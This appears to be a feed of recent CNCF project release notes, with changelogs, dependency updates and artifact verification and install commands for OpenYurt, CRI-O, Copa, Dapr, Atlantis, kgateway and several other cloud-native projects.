OpenYurt incubating

An open platform that extending your native Kubernetes to edge.

v1.7.0

What's New

OTA Upgrade Supports Image Preheating for DaemonSet

OTA (Over-The-Air) upgrade is a new upgrade model for DaemonSet workloads introduced by OpenYurt. In previous versions, image pulling occurred synchronously during the Pod restart phase of the upgrade, making it a critical-path operation that directly contributed to service downtime, especially in edge environments with limited or unstable network connectivity.

In v1.7.0, OTA upgrade now supports image preheating, which decouples image pulling from the actual rollout cutover. A new ImagePreHeat controller is responsible for dispatching image preheating Jobs to edge nodes, allowing updated container images to be proactively downloaded before the upgrade is triggered. Two new Pod conditions (PodNeedUpgrade and PodImageReady) are introduced to track upgrade status and image readiness. Users can initiate preheating via a new OTA API endpoint (POST /openyurt.io/v1/namespaces/{ns}/pods/{podname}/imagepull). By pre-caching images ahead of the cutover, service interruption during the actual upgrade is minimized to near-zero.
#2482
#2474

Support Deploying Kubernetes Clusters Locally (K8s-on-K8s)

OpenYurt v1.7.0 introduces the ability to deploy a Kubernetes cluster on top of an existing OpenYurt cluster — referred to as K8s-on-K8s. This is particularly useful for scenarios such as testing, multi-tenant isolation, and edge IDC (Internet Data Center) deployments where a full bare-metal Kubernetes setup is not practical.

This release adds YAML-based templates for deploying tenant control-plane components (tenant-apiserver, tenant-controller-manager, tenant-scheduler, tenant-pki-generator, etcd) along with post-install configuration (kube-proxy, kubelet, rbac, bootstrap-secret). yurtadm now supports a local mode for joining IDC nodes into a K8s-on-K8s cluster, and YurtHub is optimized for local mode operation. A setup script (config/setup/K8s-on-K8s/setup.sh) is also provided for quick bootstrapping.
#4a1f0ab3
#ed2f7dbf
#3a03b00d

Label-Driven YurtHub Deployment via YurtNodeConversion

Previously, YurtHub installation and lifecycle management on edge nodes required manual intervention through yurtadm join or yurtadm reset commands. In v1.7.0, a new YurtNodeConversionController in yurt-manager enables label-driven YurtHub deployment and conversion. By applying a label to a node, users can trigger the automatic installation, configuration, and startup of YurtHub via systemd. The conversion and revert process now uses reusable host lifecycle helpers, enabling a fully declarative, controller-driven workflow for edge node onboarding and offboarding.
#249a6714
#f7645df8
#3e02cefa

Support Kubernetes v1.34

All k8s.io/xxx dependencies and related modules have been upgraded to v1.34.0, ensuring OpenYurt is fully compatible with Kubernetes v1.34. E2E testing has been updated to validate the upgrade against a Kubernetes v1.34 cluster. This upgrade also includes vendor dependency updates and Go linting fixes for compatibility with the latest toolchain.
#5cccf119
#7589921e

Other Notable changes

Fixes

  • Always overwrite server-addr in yurt-static-set-yurt-hub configmap by yurtadm by @rayne-Li in #2271
  • Test: fix nodepool e2e test by @tnsimon in #2283
  • Fix openyurt fuzz test by @tnsimon in #2319
  • Fix issue 2253 by @RG-Dou in #2330
  • Ensure hub leader configmap is deleted with nodepool by @tnsimon in #2324
  • Fix ota controller doesn't has permission to patch pod status by @PersistentJZH in #2415
  • Fix: Fix the issue where the masterservice and serviceenvupdater modified the multiplexer cache by @zyjhtangtang in #2481
  • Fix dummy-if name length exceeds 15 by @KubeKyrie in #2486
  • Bugfix: remove deprecated rand.Seed() calls by @shiavm006 in #2499
  • Fix: race condition in cache manager's inMemoryCache by @Shivam Mittal in #2508
  • Fix: restore from backup and return error on ReplaceComponentList create/write failure by @Shivam Mittal in #2507
  • Fix NodeAutonomy condition LastTransitionTime never being updated by @aman Kumar in #2502
  • Fix: guard nil request info in autonomy proxy by @Shivam Mittal in #2517
  • Fix: nil pointer dereference in local proxy (localDelete/localPost) by @Shivam Mittal in #2515
  • Fix: avoid panic on pod without owner refs by @zyjhtangtang in #2509
  • Fix: add unit test cases for modifyresponse by @kartik angiras in #2497
  • Fix/UT error by @tnsimon in #2535

Proposals

New Contributors

Full Changelog: v1.6.0...v1.7.0

Keycloak incubating

Keycloak is an open-source identity and access management solution for modern applications and services, built on top of industry security standard protocols.

nightly

[quarkus-next] Aurora CI fails with missing quarkus-bom:999-SNAPSHOT …

…on remote EC2 VM (#48595)

Closes: #48594

Signed-off-by: Peter Zaoral <pzaoral@redhat.com>

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

v1.3.2

[Backport release-1.3] fix(seaweedfs): pass filer.replicas and s3.rep…

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

api/apps/v1alpha1/v1.2.4

[Backport release-1.2] fix(harbor): remove incorrect tenant module fl…

Copa sandbox

CLI tool for directly patching container image vulnerabilities

v0.14.0

✨ Features

  • Go binary patching — patch vulnerable Go binaries by rebuilding from source with updated stdlib/deps (#1388)
  • Arch Linux support — pacman package manager (#1467)
  • RPM chroot-based patching — patch RPM images that are missing a package manager (#1473)
  • Python virtual environment patching — support venv-based site-packages via PkgPath (#1485)
  • Bulk patching improvements — skip detection and cross-registry support (#1475)
  • Test environment utilities for BuildKit integration tests (#1399)
  • Demo recordings + asciinema player added to the website (#1453)
  • Patch summary output showing total/patched/skipped vulnerabilities (#1517)
  • Fallback source resolution for Go binary patching on stripped/distroless images (#1546)

🔒 Security hardening

  • Bump otel/sdk to fix CVE-2026-24051 (#1483)
  • Validate RPM package names before distroless shell execution (#1541)
  • Validate RPM package names in dnf chroot path (#1529)
  • Validate Node.js npm tarballs before extraction (#1533)
  • Prevent Node.js shell injection via untrusted package paths (#1538)
  • Validate .NET deps.json script inputs to prevent command injection (#1537)
  • Prevent Go module flag injection via leading-dash names (#1526)
  • Prevent tag-based command injection in release workflow (#1535)
  • Codebase audit hardening (#1507)
  • Prevent apt option injection from distroless package names (#1540)
  • Cap buffered patch layer size to mitigate memory DoS (#1543)
  • Block self-hosted build workflow jobs on forked PRs (#1539)
  • Replace label-gated trusted-fork workflow with native fork PR approval (#1582, supersedes #1572, #1573)
  • Reject whitespace/control chars in Go binary path validation (#1586)

🐛 Bug fixes

  • VEX: use installed version in PURLs and add distro qualifier for BOM-VEX correlation (#1552)
  • Avoid masking package manager failures as no-updates (#1530)
  • Restore strict multi-platform failure behavior when ignore-errors=false (#1532)
  • Suppress NU1605 in generated patch.csproj for .NET (#1557)
  • Filter App.Runtime images in .NET patching (#1501)
  • Replace npm install with direct tarball replacement (#1479)
  • Resolve TUI freeze and CLI deadlock on early build errors (#1505)
  • Close progress channel when no platforms need patching (#1528)
  • Migrate docker/docker to moby/moby/client (#1525)
  • Go patching log levels (#1516)
  • Keep frontend.Dockerfile Go version aligned with go.mod and harden release pipeline (#1571)

⬆️ Dependency upgrades

  • BuildKit 0.28.1 (#1512)
  • Trivy v0.69.3 + OpenTelemetry-Go v1.43.0 (#1558)
  • google.golang.org/grpc 1.78.0 → 1.79.3 (#1480, #1502)
  • github.com/quay/claircore 1.5.45 → 1.5.52 (#1442, #1464, #1518)
  • github.com/google/go-containerregistry 0.20.7 → 0.21.3 (#1520)
  • k8s.io/apimachinery 0.35.0 → 0.35.2 (#1470, #1487)
  • testcontainers-go 0.38.0 → 0.40.0 (#1438)
  • Plus dependabot bumps for dependency groups across the project

🧹 Internal / CI

  • Refactor: structured rebuildFailure replaces rebuildErrors []string in langmgr (#1560)
  • Stabilize CI — golangci-lint alignment, deterministic tests, network retries (#1477)
  • Pin BuildKit version and set explicit DNS for podman/container env (#1563)
  • Pin scanner-plugin-template dependency in build workflow (#1544)

📚 Docs

  • Improve buildkit-frontend examples (#1498)
  • Generate v0.13.x docs (#1437)
  • Remove Microsoft support policy section from SUPPORT.md (#1455)
  • Update website footer to LF Projects Series LLC trademark disclaimer (#1566)
  • add Verity to Copa CLI adopters (#1583)
Dapr graduated

The Distributed Application Runtime (Dapr) provides APIs that simplify microservice architecture development and increases developer productivity. Whether your communication pattern is service-to-service invocation or pub/sub messaging, Dapr helps you write resilient and secured microservices....

Dapr Runtime v1.18.0-rc.2

This is the release candidate 1.18.0-rc.2

What's Changed

  • [Backport release-1.18] Workflow: Fix recursive cross-app purge and terminate by @dapr-bot in #9864
  • [Backport release-1.18] Sidecar Injector supports Native Sidecars by @dapr-bot in #9861
  • [Backport release-1.18] placement: post-round coalesce window + stable scheduler reload by @dapr-bot in #9863
  • [Backport release-1.18] Remove MCPServerResource and WorkflowAccessPolicy feature gates by @dapr-bot in #9866
  • [Backport release-1.18] Integration: speed up tests by @dapr-bot in #9865
  • [Backport release-1.18] WorkflowAccessPolicy: Extend to all workflow operations by @dapr-bot in #9869
  • [Backport release-1.18] [1.18] Add hard anti-affinity policy option for placement and scheduler by @dapr-bot in #9862
  • [Backport release-1.18] workflow: gracefully stall on oversized payload by @dapr-bot in #9868
  • [Backport release-1.18] fix: remove availability zone requirement from AKS test clusters by @dapr-bot in #9874
  • [Backport release-1.18] Workflow: prevent orphan workflows when scheduler pod is killed by @dapr-bot in #9872
  • [Backport release-1.18] feat: improve output message of ErrActorNoAddress by adding req.ActorKey() by @dapr-bot in #9859
  • [Backport release-1.18] fix: Proto files must have different java outer classname by @dapr-bot in #9879
  • [Backport release-1.18] fix(placement): always arm coalesce timer after round to fix dissemination race by @dapr-bot in #9881
  • [Backport release-1.18] Update go-jose & OpenTelemetry by @dapr-bot in #9887
  • [Backport release-1.18] WorkflowAccessPolicy: pure allow-list with self-call exemption by @dapr-bot in #9888
  • [Backport release-1.18] Workflow: child workflow & activity attestation by @dapr-bot in #9889
  • [Backport release-1.18] Injector/Operator: use RSA keys for webhook serving certs by @dapr-bot in #9891

Full Changelog: v1.18.0-rc.1...v1.18.0-rc.2

LoxiLB sandbox

eBPF based cloud-native load-balancer. Powering Kubernetes|Edge|5G|IoT|XaaS Apps.

vlatest

Merge pull request #874 from TrekkieCoder/main

gh-868 Generate packages runnable with systemd

Istio graduated

Simplify observability, traffic management, security, and policy with the Istio service mesh.

Istio 1.30.0-rc.0

Artifacts

Spin sandbox

Spin is a framework for building and deploying serverless applications in WebAssembly.

canary

This is a "canary" release of the most recent commits on our main branch. Canary is not stable.
It is only intended for developers wishing to try out the latest features in Spin, some of which may not be fully implemented.

CRI-O graduated

CRI-O is a secure, performant, and stable Container Runtime Interface (CRI) implementation for the Kubelet to orchestrate Open Container Initiative (OCI) containers in production Kubernetes environments. CRI-O's scope is only targeted at Kubernetes, and thus can be performance optimized, rigorously tested and securely tuned for running containers, pods and images in Kubernetes clusters.

v1.36.0

CRI-O v1.36.0

The release notes have been generated for the commit range
v1.35.0...v1.36.0 on Tue, 05 May 2026 18:27:19 UTC.

Downloads

Download one of our static release bundles via our Google Cloud Bucket:

The OpenVEX report for this release is available at:

The SLSA provenance attestation for this release is available at:

All release artifacts (bundles, SBOMs, VEX, and provenance) are also available as signed OCI artifacts at ghcr.io/cri-o/bundle:v1.36.0.

To verify the artifact signatures via cosign, run:

> export COSIGN_EXPERIMENTAL=1
> cosign verify-blob cri-o.amd64.v1.36.0.tar.gz \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.amd64.v1.36.0.tar.gz.bundle

To verify the bill of materials (SBOM) in SPDX format using the bom tool, run:

> tar xfz cri-o.amd64.v1.36.0.tar.gz
> bom validate -e cri-o.amd64.v1.36.0.tar.gz.spdx -d cri-o

To verify the OpenVEX vulnerability report, run:

> cosign verify-blob cri-o.v1.36.0.openvex.json \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.v1.36.0.openvex.json.bundle

To verify the SLSA provenance attestation, run:

> cosign verify-blob cri-o.v1.36.0.provenance.json \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.v1.36.0.provenance.json.bundle

Changelog since v1.35.0

Changes by Kind

Other

  • Nri: pass any container POSIX rlimits to NRI plugins as input. (#9707, @klihub)
  • Nri: pass any container user ID/group ID information to NRI plugins as input (#9708, @klihub)
  • Nri: pass more complete container status to NRI, including PID, exit code, and timestamps fro container creation, start, and exit events (#9706, @klihub)

Dependency-Change

Feature

  • Add OpenVEX vulnerability report generation for releases (#9767, @saschagrunert)
  • Add container_runtime_crio_default_runtime metric to display which default runtime the node is configured to use (#9870, @haircommander)
  • Added tls_min_version and tls_cipher_suites configuration options to [crio.api] for configuring TLS settings on streaming and metrics servers. Supports TLS 1.2 (default) and TLS 1.3. (#9723, @asahay19)
  • Added support for configuring additional read-only artifact stores via the additional_artifact_stores configuration option. (#9702, @pauloappbr)
  • Implement StreamContainers, StreamContainerStats, StreamPodSandboxes, StreamPodSandboxStats, StreamPodSandboxMetrics, StreamImages (#9761, @bitoku)

Bug or Regression

  • Fix concurrent RemoveImage race condition by handling ErrNotAnImage as an idempotent deletion result. (#9803, @jnovy)
  • Fixed UpdateContainerResources to apply cgroupv2 unified settings (#9820, @PannagaRao)
  • Fixed a bug where CRI-O didn't return all metrics when "all" is set. (#9719, @bitoku)
  • Fixed a panic when concurrent StopContainer calls race against the stop lifecycle completing. (#9799, @sabujmaity)
  • Fixed a regression in v1.35.0 where systemd containers with hostUsers: false (user namespaces enabled) would fail with "Permission denied" errors when systemd attempted to create cgroups. (#9712, @saschagrunert)
  • Fixed cases where regular container images could accidentally be pulled into the OCI artifact store (#9782, @bitoku)
  • Fixed the race condition where cri-o reports exitCode 255 when the container exits fast. (#9846, @bitoku)
  • PullImage now returns the image ID directly, ensuring compatibility with Kubernetes credential verification for image pulls. (#9728, @saschagrunert)
  • Respect the same pinned_images configuration used by regular container images (#9836, @bitoku)

Other (Cleanup or Flake)

  • Skip the OCI artifact pull fallback when the initial image pull fails due to a retryable error (#9778, @bitoku)

Uncategorized

  • Add min_injected_gomaxprocs option, which allows a user to specify GOMAXPROCS in every container CRI-O creates. The config field itself is an integer that represents the floor of GOMAXPROCS. CRI-O will inject max(floor, cpu.request), if the pod is not a guaranteed pod or is part of a partitioned workload (#9860, @harche)
  • CRI-O now continuously monitors CNI plugin health using the STATUS
    verb. If a plugin becomes unhealthy after initial readiness, the node
    is reported as NetworkReady=false, preventing pod scheduling on
    affected nodes. The node self-heals when the plugin recovers. (#9855, @tsorya)

Dependencies

Added

  • cyphar.com/go-pathrs: v0.2.1
  • github.com/checkpoint-restore/go-criu/v8: v8.2.0
  • github.com/clipperhouse/displaywidth: v0.6.0
  • github.com/clipperhouse/stringish: v0.1.1
  • github.com/clipperhouse/uax29/v2: v2.3.0
  • github.com/mistifyio/go-zfs/v4: v4.0.0
  • github.com/olekukonko/cat: 50322a0
  • k8s.io/cri-streaming: v0.36.0-rc.0
  • k8s.io/streaming: v0.36.0-rc.0

Changed

  • capnproto.org/go/capnp/v3: v3.1.0-alpha.1 → v3.1.0-alpha.2
  • cel.dev/expr: v0.24.0 → v0.25.1
  • github.com/BurntSushi/toml: v1.5.0 → v1.6.0
  • github.com/avast/retry-go/v4: v4.6.1 → v4.7.0
  • github.com/checkpoint-restore/checkpointctl: v1.4.0 → v1.5.0
  • github.com/cncf/xds/go: 0feb691 → ee656c7
  • github.com/containerd/console: v1.0.4 → v1.0.5
  • github.com/containerd/containerd: v1.7.29 → v1.7.30
  • github.com/containerd/stargz-snapshotter/estargz: v0.17.0 → v0.18.2
  • github.com/containers/conmon-rs: 737e4d6 → v0.7.3
  • github.com/coreos/go-systemd/v22: v22.6.0 → v22.7.0
  • github.com/cyphar/filepath-securejoin: v0.4.1 → v0.6.1
  • github.com/docker/cli: v28.5.1+incompatible → v29.1.5+incompatible
  • github.com/docker/docker-credential-helpers: v0.9.4 → v0.9.5
  • github.com/docker/docker: v28.5.1+incompatible → v28.5.2+incompatible
  • github.com/emicklei/go-restful/v3: v3.12.2 → v3.13.0
  • github.com/envoyproxy/go-control-plane/envoy: v1.35.0 → v1.36.0
  • github.com/envoyproxy/go-control-plane: 75eaa19 → v0.14.0
  • github.com/envoyproxy/protoc-gen-validate: v1.2.1 → v1.3.0
  • github.com/go-chi/chi/v5: v5.2.3 → v5.2.5
  • github.com/godbus/dbus/v5: v5.2.0 → v5.2.2
  • github.com/google/go-containerregistry: v0.20.6 → v0.20.7
  • github.com/google/pprof: f64d9cf → 294ebfa
  • github.com/grpc-ecosystem/grpc-gateway/v2: v2.27.3 → v2.28.0
  • github.com/klauspost/compress: v1.18.0 → v1.18.3
  • github.com/mattn/go-runewidth: v0.0.16 → v0.0.19
  • github.com/mattn/go-sqlite3: v1.14.32 → v1.14.33
  • github.com/maxbrunsfeld/counterfeiter/v6: v6.12.0 → v6.12.1
  • github.com/moby/spdystream: v0.5.0 → v0.5.1
  • github.com/olekukonko/ll: v0.0.9 → v0.1.3
  • github.com/olekukonko/tablewriter: v1.1.0 → v1.1.2
  • github.com/onsi/ginkgo/v2: v2.27.3 → v2.28.1
  • github.com/onsi/gomega: v1.38.3 → v1.39.1
  • github.com/opencontainers/runc: v1.3.2 → v1.4.0
  • github.com/opencontainers/runtime-tools: edf4cb3 → 5e63903
  • github.com/opencontainers/selinux: v1.12.0 → v1.13.1
  • github.com/pkg/sftp: v1.13.9 → v1.13.10
  • github.com/proglottis/gpgme: v0.1.5 → v0.1.6
  • github.com/prometheus/common: v0.67.4 → v0.67.5
  • github.com/prometheus/procfs: v0.17.0 → v0.19.2
  • github.com/secure-systems-lab/go-securesystemslib: v0.9.1 → v0.10.0
  • github.com/sergi/go-diff: 5b0b94c → v1.4.0
  • github.com/sigstore/sigstore: v1.10.0 → v1.10.3
  • github.com/sirupsen/logrus: v1.9.3 → v1.9.4
  • github.com/urfave/cli: v1.22.16 → v1.22.17
  • github.com/vbauerster/mpb/v8: v8.10.2 → v8.11.3
  • go.opentelemetry.io/contrib/detectors/gcp: v1.38.0 → v1.39.0
  • go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc: v0.64.0 → v0.66.0
  • go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp: v0.63.0 → v0.65.0
  • go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/exporters/otlp/otlptrace: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/metric: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/sdk/metric: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/sdk: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/trace: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel: v1.39.0 → v1.41.0
  • go.podman.io/common: v0.66.1 → 1e46b07
  • go.podman.io/storage: v1.61.0 → b0f86df
  • golang.org/x/crypto: v0.46.0 → v0.48.0
  • golang.org/x/mod: v0.30.0 → v0.32.0
  • golang.org/x/net: v0.48.0 → v0.51.0
  • golang.org/x/oauth2: v0.33.0 → v0.35.0
  • golang.org/x/sys: v0.39.0 → v0.41.0
  • golang.org/x/telemetry: bc8e575 → bd525da
  • golang.org/x/term: v0.38.0 → v0.40.0
  • golang.org/x/text: v0.32.0 → v0.34.0
  • golang.org/x/tools: v0.39.0 → v0.41.0
  • google.golang.org/genproto/googleapis/api: ff82c1b → 4cfbd41
  • google.golang.org/genproto/googleapis/rpc: ff82c1b → 4cfbd41
  • google.golang.org/grpc: v1.77.0 → v1.79.3
  • google.golang.org/protobuf: v1.36.10 → f2248ac
  • k8s.io/api: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/apimachinery: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/apiserver: v0.35.0-rc.0 → v0.26.2
  • k8s.io/client-go: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/component-base: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/cri-api: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/cri-client: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/klog/v2: v2.130.1 → v2.140.0
  • k8s.io/kube-openapi: 589584f → 43fb72c
  • k8s.io/kubelet: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/utils: bc988d5 → b8788ab
  • sigs.k8s.io/knftables: v0.0.19 → v0.0.20
  • sigs.k8s.io/release-utils: v0.12.2 → v0.12.3
  • sigs.k8s.io/structured-merge-diff/v6: v6.3.0 → v6.3.2

Removed

  • github.com/antlr4-go/antlr/v4: v4.13.0
  • github.com/checkpoint-restore/go-criu/v6: v6.3.0
  • github.com/coreos/go-oidc: v2.3.0+incompatible
  • github.com/coreos/go-semver: v0.3.1
  • github.com/google/cel-go: v0.26.0
  • github.com/gregjones/httpcache: 901d907
  • github.com/jonboulle/clockwork: v0.5.0
  • github.com/klauspost/cpuid/v2: v2.0.4
  • github.com/minio/sha256-simd: v1.0.0
  • github.com/pquerna/cachecontrol: v0.1.0
  • github.com/stoewer/go-strcase: v1.3.0
  • github.com/tmc/grpc-websocket-proxy: 673ab2c
  • github.com/xiang90/probing: a49e3df
  • go.etcd.io/etcd/api/v3: v3.6.5
  • go.etcd.io/etcd/client/pkg/v3: v3.6.5
  • go.etcd.io/etcd/client/v3: v3.6.5
  • go.etcd.io/etcd/pkg/v3: v3.6.5
  • go.etcd.io/etcd/server/v3: v3.6.5
  • go.etcd.io/raft/v3: v3.6.0
  • gopkg.in/go-jose/go-jose.v2: v2.6.3
  • gopkg.in/natefinch/lumberjack.v2: v2.2.1
  • k8s.io/kms: v0.35.0-rc.0
  • sigs.k8s.io/apiserver-network-proxy/konnectivity-client: v0.31.2
Kgateway sandbox

An Envoy-powered, Kubernetes-native API Gateway that integrates Kubernetes Gateway API with a control plane for API connectivity in any cloud environment.

v2.3.0-rc.1

🎉 Welcome to the v2.3.0-rc.1 release of the kgateway project!

Release Notes

Changes since v2.3.0-beta.7

New Features

  • Adds ServiceMonitor support to the controller Helm chart. (#13565)

Bug Fixes

  • Adds support for promoted v1 TLSRoute resources. (#13949)
  • Include source policy reference in route status messages when a route is dropped or replaced due to invalid policy configuration (#13957)
  • fix: Process all Gateway tls.certificateRefs and add any valid ones. (#13970)
  • Fix rust module upgrade issue (#13979)

Cleanup

  • Validate http-acl CIDR at translation time (#13974)

Contributors

Thanks to all the contributors who made this release possible:

@1Shubham7 @alexliu541 @andy-fong @chandler-solo @danehans @nfuden @pkruk @puertomontt @sebastiangaiser @sheidkamp

Installation

The kgateway project is available as a Helm chart and docker images.

Helm Charts

The Helm charts are available at:

Docker Images

The docker images are available at:

  • cr.kgateway.dev/kgateway-dev/kgateway:v2.3.0-rc.1
  • cr.kgateway.dev/kgateway-dev/sds:v2.3.0-rc.1
  • cr.kgateway.dev/kgateway-dev/envoy-wrapper:v2.3.0-rc.1

Quickstart

Try installing this release:

helm install kgateway-crds oci://cr.kgateway.dev/kgateway-dev/charts/kgateway-crds --version v2.3.0-rc.1 --namespace kgateway-system --create-namespace
helm install kgateway oci://cr.kgateway.dev/kgateway-dev/charts/kgateway --version v2.3.0-rc.1 --namespace kgateway-system --create-namespace

For detailed installation instructions and next steps, please visit our quickstart guide.

Confidential Containers sandbox

Confidential Containers is an open source community working to enable cloud native confidential computing by leveraging Trusted Execution Environments to protect containers and data.

v0.20.0

For more information on this release see the release notes and the quickstart guide.

Confidential Containers sandbox

Confidential Containers is an open source community working to enable cloud native confidential computing by leveraging Trusted Execution Environments to protect containers and data.

v0.19.0

For more information on this release see the release notes and the quickstart guide.

wasmCloud incubating

v2.0.7

What's Changed

New Contributors

Full Changelog: v2.0.5...v2.0.7

Atlantis sandbox

Terraform Pull Request Automation for Teams

v0.43.0

What's Changed

Provider AzureDevops

  • fix: webhook authentication for Azure DevOps Server by @Zamiell in #6159

Provider GitHub

Provider GitLab

  • fix: support GitLab hosted under a URL subpath by @philslab-ninja in #6406
  • fix(gitlab): prevent PullIsMergeable from self-blocking on Atlantis commit statuses by @gian25-work in #6369

Bug fixes 🐛

  • fix(events): make undiverged honor module autoplanning by @krewenki in #6428
  • fix: Prevent infinite Gitea pagination loops by @shblue21 in #6032
  • fix: trigger PR event handling on PR updates for Gitea/Forgejo by @kfkonrad in #6178
  • fix: prevent diffKeywordRegex from falsely matching YAML key=value list items in heredocs by @GMartinez-Sisti in #6422
  • fix: cancellation bug for parallel invocations without execution_order and a larger amount of tasks than the poolSize by @ramonvermeulen in #6215
  • fix: respect autodiscover.ignore_paths during apply-all by @jholm117 in #6397
  • fix(events): prevent autoplan module recursion cycles by @krewenki in #6025
  • fix: Reorder autodiscover logic by @lukemassa in #6240
  • fix: include error values in init_step_runner log messages by @kuishou68 in #6382
  • fix: use read lock for clone reuse check to unblock parallel plans by @matthewmrichter in #6376
  • fix(kustomize): pin image tag to v0.42.0 instead of latest by @nicknikolakakis in #6400

Security changes

  • fix: harden VCS comment parsing against injection with configurable blocked-args by @Copilot in #6225
  • build(docker): strip file capabilities from image filesystem by @milindc2031 in #6363

Documentation

  • docs: add AI_USAGE_POLICY.md by @Copilot in #6347
  • docs: fix --emoji-reaction supported VCS list (remove Azure DevOps, add Gitea) by @akihiro17 in #6407
  • docs: update Azure DevOps allowlist format for visualstudio.com URLs by @nimro in #6083
  • docs: Add CloudScript to adopters list by @xcloudscript in #6411

Dependencies

  • chore(deps): update node.js to v24.15.0 in .node-version (main) by @renovate[bot] in #6423
  • chore(deps): Bump dompurify from 3.2.6 to 3.4.1 by @dependabot[bot] in #6420
  • chore(deps-dev): Bump postcss from 8.5.8 to 8.5.12 by @dependabot[bot] in #6432
  • chore(deps): update ghcr.io/runatlantis/atlantis:latest docker digest to a8873d7 in dockerfile.dev (main) by @renovate[bot] in #6418
  • chore(deps): update debian:12.13-slim docker digest to f9c6a2f in dockerfile (main) by @renovate[bot] in #6421
  • chore(deps): update ngrok/ngrok:latest docker digest to 013f046 in docker-compose.yml (main) by @renovate[bot] in #6424
  • chore(deps): update alpine docker tag to v3.23.4 in dockerfile (main) by @renovate[bot] in #6429
  • chore(deps): update ngrok/ngrok:latest docker digest to f737dcc in docker-compose.yml (main) by @renovate[bot] in #6434
  • chore(deps): update ngrok/ngrok:latest docker digest to 6ead432 in docker-compose.yml (main) by @renovate[bot] in #6436
  • chore(deps): update dependency hashicorp/terraform to v1.14.9 in testdrive/utils.go (main) by @renovate[bot] in #6446

Other Changes

New Contributors

Full Changelog: v0.42.0...v0.43.0

Kubewarden sandbox

Kubewarden is a Policy Engine powered by WebAssembly policies. Its policies can be written in CEL, Rego (OPA & Gatekeeper flavours), Rust, Go, YAML, and others....

v1.36.0-alpha

  • chore: add release contributors section (#1690)
  • fix(ci): updatecli checking for files that does not exist (#1713)
  • chore: update container images to use adm-controller namespace (#1712)
  • refactor: update repository references to adm-controller (#1701)
  • feat(controller): allow custom labels on PolicyServer resources (#1699)

🐛 Bug Fixes

  • fix(deps): update go dependencies (#1688)
  • fix(deps): update rust dependencies (#1707)

🧰 Maintenance

  • build: v1.36.0-alpha release (#1721)
  • chore(deps): update kubewarden/github-actions action to v7 (#1719)
  • chore: Remove audit-scanner folder, not needed (#1715)
  • fix(deps): update go dependencies (#1688)
  • chore(deps): Update Helm chart dependencies (#1711)
  • build(deps): lock file maintenance (#1710)
  • chore(deps): update otel/opentelemetry-collector docker tag to v0.151.0 (#1709)
  • chore(deps): update github actions (#1708)
  • fix(deps): update rust dependencies (#1707)
  • chore(deps): update github actions (#1696)

Contributors

@AkashKumar7902, @chimera-kube-bot, @flavio, @jvanz, @kubewarden-auth-token-generator[bot], @renovate[bot], @viccuad, kubewarden-auth-token-generator[bot] and renovate[bot]

Piraeus Datastore sandbox

v2.10.6

This release brings support for the newly released Ubuntu 26.04 loader, along with a number of fixes and improvements. To list a few of them

  • Fix incorrect capability spec for the nfs-server
  • Update DRBD and LINSTOR to fix a potential data loss issue when syncing on thin volumes.
  • Update LINSTOR CSI to improve validations for RWX volumes
  • Update LINSTOR Affinity Controller to allow skipping reconciliation of specific volumes.

Added

  • Image configuration for Ubuntu 26.04 (Resolute Raccoon)

Fixed

  • Fixed NFS Server DaemonSet capabilities.

Changed

  • Updated images:
    • LINSTOR 1.33.2
    • LINSTOR CSI 1.11.0
    • DRBD 9.3.2
    • LINSTOR Affinity Controller 1.4.0
Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

v1.3.0

Cozystack v1.3.0

Cozystack v1.3.0 brings storage-aware pod scheduling via a LINSTOR scheduler extender, a managed LINSTOR GUI web console with Keycloak SSO, a curated VM Default Images catalog for out-of-the-box virtual-machine provisioning, a new WorkloadsReady / Events observability surface with S3 bucket metering, and cross-namespace VMInstance backup restore with a full RestoreJob dashboard flow. The release also ships stricter tenant-name validation, VMInstance network-selector improvements, Keycloak theme injection and SMTP configuration, a host-runtime preflight check, and rolls up every fix from the v1.2.1 → v1.2.4 patch line.

Note: Items marked (backported to v1.2.x) were also shipped in v1.2.1, v1.2.2, v1.2.3, or v1.2.4 patch releases.

Feature Highlights

Storage-Aware Scheduling via the LINSTOR Extender

The cozystack-scheduler now calls a LINSTOR scheduler extender for storage-locality-aware pod placement. When a pod declares both a SchedulingClass and LINSTOR-backed PVCs, the scheduler consults LINSTOR to prefer nodes where volume replicas already exist — reducing cross-node replication traffic and improving I/O latency for storage-heavy workloads such as databases, object stores, and VMs.

